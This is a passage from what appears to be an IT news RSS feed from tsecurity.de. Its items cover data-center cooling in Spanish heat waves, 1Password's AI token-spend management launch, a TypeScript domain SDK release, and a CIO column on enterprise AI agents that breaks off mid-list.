<p class="wp-block-paragraph">Industry representatives explain that while the climate can have an impact and is already taken into account when deciding where to locate a data center, it is not yet the sole factor or the most decisive one. In other words, many other factors must be considered, and these carry much more weight in the decision-making process. One such factor is energy, which is essential for these infrastructures and must be constant, resilient, and have a low carbon footprint. It is also an area where cooling plays a major role. As Román points out, cooling can account for between 30 and 40% of energy consumption, “and in poorly managed facilities, that figure approaches 50%.” Energy efficiency and cooling efficiency are thus essential—and not just for sustainability reasons. “It’s a matter of the bottom line.”</p>



<p class="wp-block-paragraph">Another factor is space. As Benito says, you need “stable locations where you can grow.” This isn’t just about whether the infrastructure <em>fits</em>, but also about how it aligns with the needs of its customers. As this expert points out, the concentration of data centers near Madrid or Barcelona isn’t “just a whim,” but because you need to be close to large population centers to provide them with low latency. “Other supercomputing applications can be located farther away, and that’s already happening,” he explains, but generally speaking, you can’t just put data centers anywhere. You have to strike a balance between needs and available space.</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow"></blockquote>



<h2 class="wp-block-heading">How to survive the heat</h2>



<p class="wp-block-paragraph">So, how can we survive the heat, especially when projections suggest that the future will bring even higher temperatures? The key is to understand that this is no longer a curiosity or an occasional incident. As Román points out, air-conditioning systems are running longer and longer. What worked 10 years ago will now barely suffice—it’s “pushed to its limits.” “Heat is shifting from being an August blip to a variable that must be monitored year-round. One you endure; the other you manage.”</p>



<p class="wp-block-paragraph">“By the time the room’s thermometer rises, it’s already too late. What you need to monitor isn’t the room—it’s the equipment—and you have to do it sooner,” he says. Román recommends a three-step strategy. First, don’t measure the environment; instead, measure the equipment and its variations in temperature, vibrations, and energy consumption. Next, take action on any deviations: Don’t wait for a failure, but instead act on early indicators that things aren’t normal. And finally, keep a comprehensive record of historical data, which will be key to anticipating issues and learning from them. “And here I’m going to be honest, because this is what I see every day: The technology to do all this already exists and isn’t expensive,” he asserts. “Many critical facilities are still managed using an Excel spreadsheet and the memory of a technician who’s been there for twenty years,” he warns. And that’s a problem.</p>



<p class="wp-block-paragraph">In the specific case of data centers, Spain has done its homework. The high temperatures (which exceeded those recorded in the United Kingdom, where some data centers did shut down) did not bring them to a halt during this heat wave.</p>



<p class="wp-block-paragraph">Unlike what might happen in other countries, Spain has optimized its cooling systems to be efficient and sustainable, as Benito explains, noting that the country must also contend with water stress. “In other countries, I can use water and let it evaporate as I please because I know it’s going to rain again—or at least that was the case until recently. In Spain, we’ve known for a long time that this isn’t the case,” he says. That’s why we work with closed-loop systems. “Most of us operators don’t use any water,” he says. The same water, mixed with certain cooling agents, circulates continuously. “Once the loop is filled, we don’t lose a single drop,” he asserts.</p>



<p class="wp-block-paragraph">What this expert is now seeing at international conferences is that in other countries where water wasn’t an apparent problem, people are starting to talk about working this way—”as a technical innovation.” “That’s where we say, ‘Yes, just like the ones we have in Spain or Portugal,’” he remarks with a touch of humor. “Water, like energy, is a challenge,” he says, so everything has already been designed with that in mind. It isn’t wasted, it doesn’t evaporate, and it isn’t consumed, he says.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenCoreDev Releases Domain SDK 0.2.0: One TypeScript API to Add, Verify, and Remove Customer Domains Across Five Platforms]]></title>
<description><![CDATA[OpenCoreDev has published Domain SDK 0.2.0, a TypeScript client for the custom domain lifecycle. It covers Vercel, Cloudflare for SaaS, Railway, Render, and Netlify behind one API. Status is modeled as an eight-value union, with separate verification and certificate fields.
The post OpenCoreDev R...]]></description>
<link>https://tsecurity.de/de/3669067/ai-nachrichten/opencoredev-releases-domain-sdk-020-one-typescript-api-to-add-verify-and-remove-customer-domains-across-five-platforms/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3669067/ai-nachrichten/opencoredev-releases-domain-sdk-020-one-typescript-api-to-add-verify-and-remove-customer-domains-across-five-platforms/</guid>
<pubDate>Tue, 14 Jul 2026 22:18:19 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenCoreDev has published Domain SDK 0.2.0, a TypeScript client for the custom domain lifecycle. It covers Vercel, Cloudflare for SaaS, Railway, Render, and Netlify behind one API. Status is modeled as an eight-value union, with separate verification and certificate fields.</p>
<p>The post <a href="https://www.marktechpost.com/2026/07/14/opencoredev-releases-domain-sdk-0-2-0-one-typescript-api-to-add-verify-and-remove-customer-domains-across-five-platforms/">OpenCoreDev Releases Domain SDK 0.2.0: One TypeScript API to Add, Verify, and Remove Customer Domains Across Five Platforms</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[1Password moves into AI cost management, betting that token spend is the next enterprise budget crisis]]></title>
<description><![CDATA[1Password on Tuesday launched AI Spend and Consumption Management, a new capability embedded in its SaaS Manager platform that gives IT and finance teams a unified, real-time view of how their organizations consume and spend on AI services from vendors including Anthropic, Cursor, and OpenAI.The ...]]></description>
<link>https://tsecurity.de/de/3668120/it-nachrichten/1password-moves-into-ai-cost-management-betting-that-token-spend-is-the-next-enterprise-budget-crisis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3668120/it-nachrichten/1password-moves-into-ai-cost-management-betting-that-token-spend-is-the-next-enterprise-budget-crisis/</guid>
<pubDate>Tue, 14 Jul 2026 15:32:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://1password.com/">1Password</a> on Tuesday launched <a href="https://1password.com/product/saas-manager">AI Spend and Consumption Management</a>, a new capability embedded in its SaaS Manager platform that gives IT and finance teams a unified, real-time view of how their organizations consume and spend on AI services from vendors including <a href="https://www.anthropic.com/">Anthropic</a>, <a href="https://cursor.com/">Cursor</a>, and <a href="https://openai.com/">OpenAI</a>.</p><p>The move marks the latest strategic expansion for a company that built its reputation on password management for consumers and, over the past three years, has aggressively repositioned itself as a broader identity security and SaaS governance platform for enterprise buyers. With this release, 1Password is staking a claim in one of enterprise technology's newest and most chaotic budget categories: the consumption-based cost of large language models.</p><p>"Executives want teams to build faster with AI, but that speed is creating a new kind of spending pressure," Greg Henry, 1Password's chief financial officer, said in an exclusive interview with VentureBeat. "Developers are consuming tokens at a pace that traditional budgets weren't built to manage, and IT and finance teams are being asked to forecast and justify AI investments without a clear view of what's actually driving costs."</p><p>The product, now in public preview with broad availability planned for fall 2026, connects directly to vendor admin APIs to pull token-level consumption data daily. It normalizes that data across providers into a single dashboard and allows organizations to set vendor-level spend limits, configure threshold-based alerts via Slack and email, and break down usage by team, user, vendor, and model.</p><div></div><h2><b>Why traditional software budgets can't keep up with AI token pricing</b></h2><p>The core challenge <a href="https://1password.com/">1Password</a> is targeting is structural. Traditional SaaS pricing operates on a per-seat, per-year model that is easy to budget and reconcile. AI pricing does not. Every API call to <a href="https://claude.ai/">Claude</a>, <a href="https://openai.com/index/gpt-5-6/">GPT-5.6</a>, or a <a href="https://cursor.com/docs/api">Cursor-powered coding assistant</a> consumes tokens, and the cost of those tokens varies by model, by input versus output, and by the complexity of the task. A single engineering team running agentic workflows can burn through a prepaid token budget in weeks — and the finance team may not notice until the invoice arrives.</p><p>Henry drew a sharp analogy to a problem enterprises have already lived through once. "Consumption-based pricing isn't new," he said. "We saw it arrive with cloud infrastructure, and it took years to build the tools and disciplines to manage it. AI is the next version of that shift."</p><p>That comparison resonates across the industry. When <a href="https://aws.amazon.com/">Amazon Web Services</a>, <a href="https://azure.microsoft.com/en-us">Microsoft Azure</a>, and <a href="https://cloud.google.com/">Google Cloud</a> popularized consumption-based pricing for compute and storage in the 2010s, enterprises initially lacked the tooling to monitor and optimize their cloud bills. That gap spawned an entire FinOps ecosystem — companies like CloudHealth, Spot.io, and Apptio built multi-billion-dollar businesses helping organizations understand what they were spending on cloud and why. Henry is explicitly betting that AI token spend will follow the same trajectory, and that organizations that fail to build visibility now will end up, as he put it, "paying far more than they needed to, for far longer than they should have."</p><p>The scale of the coming wave lends credibility to that bet. Goldman Sachs has estimated that token consumption from AI agents alone will grow 24 times by 2030, a projection driven by the expectation that autonomous AI systems will increasingly execute multi-step workflows — booking travel, writing and deploying code, managing customer service interactions — that generate vastly more API calls than a human sitting at a chat interface.</p><h2><b>How 1Password's new dashboard tracks every token across Anthropic, Cursor, and OpenAI</b></h2><p>The new capability extends <a href="https://1password.com/product/saas-manager">1Password SaaS Manager</a>'s existing foundation of application discovery, license management, and spend analytics. It is not a standalone product. Existing SaaS Manager customers can activate it by connecting their supported AI vendor API keys, at which point consumption data flows into a dedicated AI Consumption Management dashboard. Henry confirmed that there is no separate product or add-on fee: "AI Spend and Consumption Management is available to all 1Password SaaS Manager customers."</p><p>The system provides four core functions. First, it aggregates token usage and spend across Anthropic, Cursor, and OpenAI into a single, normalized view — eliminating the need to toggle between three separate vendor dashboards with three different reporting formats. Second, it enables budget controls: organizations can set vendor-level spend limits, configure percentage-based thresholds, and receive automated alerts when prepaid balances approach depletion. Third, it disaggregates consumption by team, user, vendor, and model, allowing finance and IT to understand not just how much is being spent, but where and by whom. Fourth, it situates AI spend within the broader SaaS portfolio, helping organizations see how token costs relate to their total software investment.</p><p>Notably, the system captures consumption regardless of whether a human or an AI agent generated it. "Token consumption is captured at the API level regardless of whether a human or an agent is generating it," Henry explained. "Organizations get the total consumption picture, including the spikes that agent loops can create, which can be some of the hardest usage to catch before it becomes a problem."</p><p>That agent-level visibility matters because autonomous AI systems can generate runaway costs in ways that human users typically cannot. An agentic coding assistant stuck in a retry loop, for example, can consume thousands of dollars in tokens in minutes — with no human in the loop to notice. For now, the product alerts but does not enforce. When asked whether 1Password will eventually give organizations the ability to automatically cut off spending when a threshold is crossed, Henry said the company is "actively evaluating" automatic enforcement but emphasized that visibility must come first: "You can't enforce what you can't see."</p><h2><b>The choice of launch partners reveals where enterprise AI budgets are under the most pressure</b></h2><p>The decision to start with <a href="https://www.anthropic.com/">Anthropic</a>, <a href="https://cursor.com/">Cursor</a>, and <a href="https://openai.com/">OpenAI</a> — rather than casting a wider net — reflects where enterprise AI adoption and budget strain are most concentrated right now. Henry said the choice was driven entirely by customer demand. "Anthropic, Cursor, and OpenAI are where we're seeing the highest adoption, and where token consumption can move fast and get ahead of the teams responsible for managing it," he said. The company plans to add additional vendors based on customer demand, API availability, and budget impact, though it has not committed to a specific timeline or vendor list.</p><p>The inclusion of Cursor alongside the two major foundation model providers is telling. <a href="https://cursor.com/">Cursor</a>, an AI-powered code editor that has rapidly gained traction among developers, represents a category of AI tool where consumption is particularly difficult to forecast. Unlike a chatbot interface where a user consciously types a prompt, Cursor integrates AI suggestions directly into the development workflow, generating token consumption continuously as developers write code. That ambient, always-on consumption pattern makes it especially prone to budget overruns.</p><p>Henry also addressed who inside an organization should actually own this problem — and acknowledged that the honest answer right now is no one. "When spend is fragmented across vendor dashboards and finance teams are reconciling it monthly, you're always behind," he said. "AI spend can't be treated as a finance-only or IT-only problem." He noted that the pricing differences between models have become significant enough that the choice of which AI model a team uses is now a meaningful financial decision, one that is pulling CFOs into conversations with IT, product, and engineering leaders "in ways they never had to before."</p><p>Steve May, director of IT at ServiceTrade, a 1Password customer that has been using the capability, said it addressed a concrete planning gap. "Forecasting tools for AI consumption and spend was one of our biggest gaps in planning because we didn't have a reliable way to track it," May said. He added that the visibility has "prevented overages that would have cost far more to fix after the fact."</p><h2><b>Where 1Password fits in the fast-consolidating SaaS management market</b></h2><p>1Password is not the only company racing to solve the AI cost management problem, but the competitive landscape is still fragmented and the category is far from mature.</p><p><a href="https://zylo.com/">Zylo</a>, a SaaS management platform that Gartner has also recognized as a leader in the space, published its <a href="https://zylo.com/news/2026-saas-management-index">2026 SaaS Management Index</a> in January showing that AI-native application spend surged 393% year over year in organizations with more than 10,000 employees and 108% overall. Zylo's data also revealed that ChatGPT has become the most expensed application in enterprise environments, highlighting how AI tools are entering organizations through employee credit cards and expense reports — outside formal procurement and governance workflows. Zylo has added its own token-level cost tracking for AI vendors including Anthropic, OpenAI, Cursor, and Perplexity.</p><p>Meanwhile, according to a comparison published by <a href="https://coommit.com/blog/saas-management-platforms-2026-zylo-vs-vendr-vs-sastrify">Coommit</a> in May, <a href="https://www.vendr.com/">Vendr</a> — which focuses more on SaaS negotiation than discovery — tracks AI tools at the contract level but does not yet offer consumption-level visibility. And the FinOps Foundation reported in its 2026 State of FinOps survey that 98% of organizations now actively manage AI costs, up from just 31% in 2024. The broader SaaS management market is also consolidating rapidly. In May, Deel acquired Sastrify, a German SaaS management vendor, and began folding it into its HR platform — a signal that SaaS management capabilities are increasingly being absorbed into adjacent enterprise platforms rather than remaining standalone products.</p><p>1Password's approach differs from pure-play SaaS management competitors in one important respect: it is building AI cost management on top of an identity security platform, not a FinOps or procurement tool. The company's SaaS Manager product grew out of its 2025 acquisition of Trelica, a UK-based SaaS access management startup whose technology enabled the discovery of unsanctioned applications — so-called shadow IT. As BetaKit reported at the time of that deal, 1Password co-CEO Jeff Shiner described Trelica as "a pioneer in modern SaaS access management" and said the acquisition would accelerate 1Password's Extended Access Management product roadmap by more than a year. CRN noted that Trelica brought more than 300 SaaS integrations to the platform. That identity-first lineage gives 1Password a natural advantage in connecting spend data to specific users and teams — a linkage that matters when the question shifts from "how much are we spending on AI?" to "who is spending it, and is it delivering value?"</p><h2><b>From password manager to platform company: 1Password's $6.8 billion bet on enterprise identity</b></h2><p>The launch raises a question that Henry addressed head-on: whether a company that started as a consumer password manager can credibly compete in enterprise AI cost management.</p><p>"It doesn't feel like a stretch to us. It feels like a natural progression," he said. "For more than 20 years, 1Password has evolved alongside how our customers work. We started by protecting passwords. Then we helped organizations manage secrets, control access, and get visibility into the applications their teams rely on."</p><p>The company's evolution has been rapid. 1Password raised a $620 million Series C in January 2022 led by ICONIQ Growth, <a href="https://news.crunchbase.com/venture/1password-620m-round-cybersecurity-investor/">reaching a $6.8 billion valuation</a> — at the time, the largest funding round ever raised by a Canadian company, according to Crunchbase. The round also attracted celebrity investors including Ryan Reynolds, Scarlett Johansson, and Robert Downey Jr. As of early 2025, BetaKit reported that 1Password had surpassed $250 million in annual recurring revenue, with B2B sales accounting for nearly three-quarters of total revenue and the company claiming to be cash-flow positive.</p><p>In May 2024, 1Password launched <a href="https://1password.com/extended-access-management">Extended Access Management</a>, a platform designed to secure sign-ins across both managed and unmanaged applications and devices. That same year, it acquired Kolide for device trust and, in early 2025, Trelica for SaaS discovery. In June 2026, Gartner named 1Password a Leader in its Magic Quadrant for SaaS Management Platforms. According to 1Password's own blog post on the recognition, its SaaS Manager now supports over 400 integrations and provides visibility into a library of more than 40,000 pre-populated application profiles. Each step has moved the company further from its consumer roots and deeper into enterprise infrastructure. The AI Spend and Consumption Management launch extends that trajectory into financial operations territory — a domain where 1Password will compete not only with SaaS management vendors but potentially with dedicated FinOps platforms and the AI vendors' own billing dashboards.</p><h2><b>Why high AI token consumption doesn't always mean wasted money</b></h2><p>Perhaps the most revealing part of Henry's commentary concerns what organizations should actually do with the consumption data once they have it. He pushed back forcefully against the assumption that high token consumption automatically signals waste.</p><p>"A team burning through tokens may be building something genuinely valuable," he said. "A lower-usage project might not be moving the business forward at all. What matters is whether that consumption is producing enough business value to justify the spend."</p><p>Henry drew a distinction between personal productivity — "having a bot summarize your meeting or draft a quick email" — and genuine business outcomes. "What organizations need to see is where consumption is actually driving revenue, efficiency, or something that moves the needle."</p><p>That framing positions AI Spend and Consumption Management not just as a cost-cutting tool but as a decision-support system for AI investment allocation. If a CFO can see that one engineering team's heavy Claude usage is powering a product feature that drives revenue, while another team's OpenAI spend is funding low-value internal automation, the organization can reallocate budget accordingly rather than imposing across-the-board cuts.</p><p>"When costs rise faster than expected, the instinct is to cut," Henry said. "But most organizations can't yet tell which teams, models, or tools are responsible for the increase, so they end up cutting across the board rather than directing investment toward the AI projects that are actually delivering business value. Blunt cuts on a technology you're counting on for competitive advantage is not a management strategy, it's a missed opportunity."</p><h2><b>The next enterprise budget crisis is already here — and it's priced per token</b></h2><p>The product's current scope — three vendor integrations, alerting but not enforcement — is clearly a starting point. Henry signaled that automatic spend limits are on the roadmap and that additional vendor integrations will follow based on customer demand.</p><p>But the broader trajectory he described suggests 1Password sees this launch as a wedge into a much larger opportunity. "As traditional SaaS products add AI capabilities, their pricing models are going to follow," he said. "Organizations that build visibility and management discipline around consumption now are going to be in a much better position when that happens across the rest of their software portfolio."</p><p>If Henry is right, the chaos currently confined to AI token budgets is not a temporary growing pain but a preview of how all enterprise software will eventually be priced. A decade ago, companies scrambled to understand their cloud bills. Today, they are scrambling to understand their AI bills. The question is whether the organizations building the dashboards this time around can get ahead of the curve — or whether, as Henry warned, they will end up where so many companies ended up with cloud, realizing too late how much they were overpaying, and for how long.</p><p>AI Spend and Consumption Management is <a href="https://1password.com/lp/saas-manager">available now in public preview</a> for 1Password SaaS Manager customers. Broad availability is planned for fall 2026.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Building cyber-resilient AI in the enterprise]]></title>
<description><![CDATA[Enterprise AI deployments are scaling faster than any software category in history, now commanding 6% of the $300 SaaS market, according to venture capital firm Menlo Ventures. Meanwhile, McKinsey &amp; Company has reported that 88% of businesses have applied AI…
Read more →
The post Building cyb...]]></description>
<link>https://tsecurity.de/de/3667825/it-security-nachrichten/building-cyber-resilient-ai-in-the-enterprise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667825/it-security-nachrichten/building-cyber-resilient-ai-in-the-enterprise/</guid>
<pubDate>Tue, 14 Jul 2026 13:54:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>&lt;p&gt;Enterprise AI deployments are scaling faster than any software category in history, now commanding 6% of the $300 SaaS market, according to venture capital firm Menlo Ventures. Meanwhile, McKinsey &amp;amp; Company has reported that 88% of businesses have applied AI…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/building-cyber-resilient-ai-in-the-enterprise/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/building-cyber-resilient-ai-in-the-enterprise/">Building cyber-resilient AI in the enterprise</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Datensicherheit: Warum Microsoft Purview nur die halbe Miete ist]]></title>
<description><![CDATA[Mittelständische Unternehmen nutzen längst deutlich mehr SaaS-Anwendungen als ihre Sicherheitsteams im Blick haben. Klassische Schutzlösungen wie Microsoft Purview stoßen dabei schnell an ihre Grenzen, aber spezialisierte Alternativen sind für viele Betriebe schlicht unerschwinglich. Eine Gefahr ...]]></description>
<link>https://tsecurity.de/de/3667593/it-security-nachrichten/datensicherheit-warum-microsoft-purview-nur-die-halbe-miete-ist/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667593/it-security-nachrichten/datensicherheit-warum-microsoft-purview-nur-die-halbe-miete-ist/</guid>
<pubDate>Tue, 14 Jul 2026 12:26:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mittelständische Unternehmen nutzen längst deutlich mehr SaaS-Anwendungen als ihre Sicherheitsteams im Blick haben. Klassische Schutzlösungen wie Microsoft Purview stoßen dabei schnell an ihre Grenzen, aber spezialisierte Alternativen sind für viele Betriebe schlicht unerschwinglich. Eine Gefahr für die Datensicherung.]]></content:encoded>
</item>
<item>
<title><![CDATA[How AI agents are shaping the future of work]]></title>
<description><![CDATA[I attended several major technology conferences in 2025 where the first AI agents embedded in enterprise SaaS platforms were announced. Some of these agents showed promise and a glimpse into the future of work, while others looked like natural language extensions of a platform’s existing function...]]></description>
<link>https://tsecurity.de/de/3667534/it-security-nachrichten/how-ai-agents-are-shaping-the-future-of-work/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3667534/it-security-nachrichten/how-ai-agents-are-shaping-the-future-of-work/</guid>
<pubDate>Tue, 14 Jul 2026 12:07:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I attended several major technology conferences in 2025 where the first AI agents embedded in enterprise SaaS platforms were announced. Some of these agents showed promise and a glimpse into the future of work, while others looked like natural language extensions of a platform’s existing functionality.  </p>



<p class="wp-block-paragraph">At the end of 2025, Anthropic and OpenAI launched new AI models and code-generating capabilities. More developers tried <a href="https://www.infoworld.com/article/4058076/vibe-coding-and-the-future-of-software-development.html">vibe coding</a>, and some platforms launched <a href="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development.html">spec-driven development capabilities</a>. By February 2026, even The New York Times reported that <a href="https://www.nytimes.com/2026/02/18/opinion/ai-software.html">the AI disruption had arrived</a>, noting that code generators were building “apps that may be flawed, but credible.”</p>



<p class="wp-block-paragraph">Wall Street investors took notice of the code-generation improvements and other disruptive factors, driving a selloff in SaaS stocks, now referred to as the “<a href="https://www.bloomberg.com/news/articles/2026-02-03/-get-me-out-traders-dump-software-stocks-as-ai-fears-take-hold">SaaSpocalypse</a>.” Part of their concern stemmed from the belief that CIOs would use AI to <a href="https://www.cio.com/article/4148303/cios-rethink-softwares-future-as-ai-agents-advance.html">write software that would replace SaaS solutions</a>.</p>



<h2 class="wp-block-heading">AI innovations from SaaS and solution providers</h2>



<p class="wp-block-paragraph">But I thought differently and wrote a response in my article asking whether <a href="https://www.cio.com/article/4146669/is-ai-the-end-of-saas-as-we-know-it.html">AI is the end of SaaS as we know it</a>. CIOs might use AI to accelerate application modernization, but I doubt they would replace their ERP, CRM, and even smaller SaaS point solutions by building them.</p>



<p class="wp-block-paragraph">Instead, I believed it would be SaaS companies that would take the most advantage of AI code-generation capabilities.</p>



<p class="wp-block-paragraph">This hypothesis drove me to attend nine conferences this spring to see how SaaS companies were launching AI agents and defining a new future of work. I wrote eight articles on <a href="https://drive.starcio.com/cios-need-to-know">what CIOs need to know</a> about data management, agile organizations, marketing, ERPs, critical process management, and other evolutions to plan for in the AI era.</p>



<p class="wp-block-paragraph">Now, looking across all nine conferences, I can draw some conclusions about how AI agents are shaping the future of work. Here are my learnings and what CIOs need to consider when evaluating and deploying AI agents in the workplace.</p>



<h2 class="wp-block-heading">Agentic, human-in-the-middle, or augmenting human?</h2>



<p class="wp-block-paragraph">SaaS companies have very distinct perspectives on the future of work, including the extent to which humans will play which roles and whether and how quickly we’ll see agentic, fully automated work.</p>



<p class="wp-block-paragraph">For example, Atlassian proclaimed, “<a href="https://www.atlassian.com/company/events">step into the future of human-AI collaboration</a>,” while SAP unveiled “<a href="https://news.sap.com/2026/05/sap-sapphire-sap-unveils-autonomous-enterprise/">the autonomous enterprise</a>.” Snowflake aimed to “<a href="https://www.snowflake.com/en/summit/">make AI real for business</a>,” while Appian targeted “<a href="https://www.appianworld.com/">serious AI built on process</a>.”</p>



<p class="wp-block-paragraph">These vendors’ marketers had to decide whether to lead with AI, people, or business in their messaging, but so must CIOs as they contemplate their AI strategies and how to get employees to fully adopt AI agents.</p>



<p class="wp-block-paragraph">Some CIOs see a fully automated agentic AI as the future, with human-in-the-middle as a transitional phase as departments build trust in AI agents’ decision-making and automation capabilities.</p>



<p class="wp-block-paragraph">Other CIOs see AI more as a tool that delivers productivity improvements by augmenting human decision-making capabilities. Many of these CIOs see human augmentation as essential to supporting critical thinking, innovation, and creativity.</p>



<p class="wp-block-paragraph"><a href="https://www.deloitte.com/us/en/what-we-do/capabilities/applied-artificial-intelligence/content/state-of-ai-in-the-enterprise.html">Deloitte’s State of AI Report</a>, published in January, provides a benchmark. It states that 36% of IT leaders expect at least 10% of their jobs to be fully automated in the next year, and 82% expect to reach that benchmark in three years.</p>



<p class="wp-block-paragraph">Many organizations will have a mix of AI agents, choosing automation where reliability at scale is possible, but opting for human augmentation in operationally critical or customer-facing domains. But how CIOs position AI agents is not only an operational strategy; it’s also a cultural statement that shapes employees’ embrace of AI and whether <a href="https://drive.starcio.com/2026/03/ai-leadership-job-at-risk-or-career-opportunity/">detractors vocalize job-loss fears</a>.</p>



<p class="wp-block-paragraph">In the short term, it will also weigh in on which AI agents to use from different partners and which areas to build in-house.</p>



<h2 class="wp-block-heading">Many options to test and deploy AI agents</h2>



<p class="wp-block-paragraph">Many solution providers are demonstrating significantly more AI agents this year. For example, SAP went from <a href="https://drive.starcio.com/2026/05/autonomous-enterprise-ai-cios/">40 Joule Agents in 2025 to over 200 in 2026.</a> Three technology capabilities are fueling this significant growth:</p>



<ul class="wp-block-list">
<li>Adobe, Appian, Boomi, Cisco, Domo, Salesforce, SAP, Snowflake, and others offer <a href="https://www.infoworld.com/article/3497094/does-your-organization-need-a-data-fabric.html">data fabrics</a> and <a href="https://www.infoworld.com/article/3487711/the-definitive-guide-to-data-pipelines.html">data-pipeline</a> capabilities to connect data sources outside the primary workflows supported by their platforms. Appian, Pega, Quickbase, and SAP also centralize business process automation, an important starting point for developing AI agents.  </li>



<li><a href="https://www.infoworld.com/article/4124612/5-requirements-for-using-mcp-servers-to-connect-ai-agents.html">MCP servers</a> enable integration and communication between AI agents and are used to facilitate multistep agentic workflows. Virtually all the companies announcing major investments in AI agents are also announcing MCP integration capabilities and related partnerships.</li>



<li>Solution providers are not just using AI code-generating capabilities; many are launching their own AI agent development tools. The first beneficiaries of these development tools are the solution providers themselves and their integration partners, who use them to accelerate the development of AI agents and make them available to customers.</li>
</ul>



<p class="wp-block-paragraph">The result is that <a href="https://drive.starcio.com/2025/10/ai-agents-definitive-guide-saas-security-titans/">CIOs will have many options about which agents to test</a>, but will have to dedicate analysts to understand the capability, cost, and compliance trade-offs. Additionally, expect AI agent capabilities to evolve significantly over the next few years, so CIOs should continuously revisit their decisions regarding deployed AI agents, focusing on performance, benefits, and ROI.</p>



<p class="wp-block-paragraph">CIOs should also watch for signs of <a href="https://www.cio.com/article/1247890/7-steps-for-turning-shadow-it-into-a-competitive-edge.html">shadow AI</a> and employee confusion about which AI agents to experiment with on different platforms. The AI strategy should include a transparent, defined process for selecting, reviewing, evaluating, procuring, deploying, driving adoption, monitoring, and collecting end-user feedback around AI agents.</p>



<h2 class="wp-block-heading">AI development capabilities for engineers and citizen builders</h2>



<p class="wp-block-paragraph">The apparent ease-of-use of AI code generators may lead some engineering teams to <a href="https://www.cio.com/article/4097339/your-next-big-ai-decision-isnt-build-vs-buy-its-how-to-combine-the-two.html">build AI agents rather than buy them</a> from SaaS providers. But CIOs should quickly realize that coding is just one step in developing AI agents, and that aggressively pursuing a build strategy can lead to <a href="https://www.cio.com/article/4178324/7-sources-of-ai-debt-and-how-to-avoid-them.html">AI debt</a> and <a href="https://www.cio.com/article/4107377/cios-will-underestimate-ai-infrastructure-costs-by-30.html">increased AI costs</a>.</p>



<p class="wp-block-paragraph">DevOps teams can code AI agents using tools such as Claude, Codex, Lovable, and Replit — a do-it-yourself approach. Some SaaS companies are providing an alternative, with AI agent development tools that leverage the data, infrastructure, and governance baked into their platforms. Many of these development tools offer flexibility, allowing developer teams to select AI models and development environments.</p>



<p class="wp-block-paragraph">Examples of new and enhanced AI development tools I saw at conferences this quarter include:</p>



<ul class="wp-block-list">
<li><a href="https://appian.com/blog/2025/appian-25-4-release-enterprise-ai-agents">Appian Composer and Agent Studio</a></li>



<li><a href="https://www.atlassian.com/software/rovo-dev">Atlassian Rovo Dev</a></li>



<li><a href="https://boomi.com/platform/companion/">Boomi Companion</a></li>



<li><a href="https://www.cisco.com/site/us/en/solutions/artificial-intelligence/agentic-ops/cloud-control-studio/index.html">Cisco Cloud Control Studio</a></li>



<li><a href="https://www.domo.com/app-catalyst">Domo App Catalyst</a></li>



<li><a href="https://www.pega.com/about/news/press-releases/pega-harnesses-best-practices-and-ai-coding-agents-build-apps-mission">Pega Infinity Studio</a></li>



<li><a href="https://www.quickbase.com/pave">Quickbase Pave</a></li>



<li><a href="https://www.snowflake.com/en/product/snowflake-coco/">Snowflake CoCo</a></li>



<li><a href="https://www.sap.com/products/artificial-intelligence/joule-studio.html">SAP Joule Studio</a>.</li>
</ul>



<p class="wp-block-paragraph">I also reviewed <a href="https://www.nutanix.com/solutions/ai">Nutanix Agentic AI</a>, a platform-as-a-service for accelerating the deployment of agentic AI workloads, and <a href="https://www.adobe.com/products/firefly/features/ai-assistant.html">Adobe Firefly AI Assistant</a> for creatives.</p>



<p class="wp-block-paragraph">These development tools can target different audiences. Some look like low-code development tools targeted at software developers, whereas others are <a href="https://drive.starcio.com/2026/05/low-code-in-the-ai-era-cios-need-to-know/">no-code and enable citizen developers</a>, i.e., businesspeople, to <a href="https://www.cio.com/article/4176062/cios-are-enlisting-business-users-to-vibe-code-their-own-apps.html">develop applications and agents</a>. Additionally, some of these tools support spec-driven development and generate artifacts such as product requirement documents (PRDs), data models, and testing capabilities.</p>



<p class="wp-block-paragraph">Before commissioning AI development for apps and agents, CIOs should sponsor proofs of technical, data, modeling, security, and governance capabilities.</p>



<h2 class="wp-block-heading">The context layer powering AI agents</h2>



<p class="wp-block-paragraph">Between AI agents and the enterprise’s intelligence, including structured data sources, defined business processes, and agent interactions (both human-to-agent and agent-to-agent), lies an evolving “context layer.”</p>



<p class="wp-block-paragraph">This layer refers to the enterprise knowledge that AI agents draw on when evaluating signals and recommending or taking actions. Context may include a knowledge graph, a semantic layer, cleansed document repositories, and other knowledge bases.</p>



<p class="wp-block-paragraph">The context layer, skills, tools, out-of-the-box agents, and governance capabilities are some areas to review where solution providers differentiate. Some examples: </p>



<ul class="wp-block-list">
